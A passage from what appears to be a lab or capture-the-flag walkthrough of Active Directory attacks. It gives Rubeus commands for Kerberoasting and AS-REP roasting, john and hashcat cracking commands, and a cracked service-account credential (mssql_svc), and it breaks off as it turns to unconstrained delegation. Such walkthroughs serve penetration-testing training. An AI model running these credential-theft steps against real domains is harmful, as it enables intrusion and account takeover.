Let’s get the kerberoastable Accounts.
execute-assembly C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe kerberoast /simple /nowrap
Now let’s try to crack the hashes.
john crackme.txt --wordlist=pass.txt
and we cracked the hash of the mssql-service.
Username: mssql_svc
Password: Cyberb0tic
First Let’s enumerate the ASREP users.
C:\\Tools\\Rubeus\\Rubeus\\bin\\Release\\Rubeus.exe asreproast /user:squid_svc /nowrap
Now let’s crack the hash.
hashcat -a 0 -m 18200 crackme.txt /usr/share/wordlists/rockyou.txt
Let’s abuse the Unconstrained Delegation.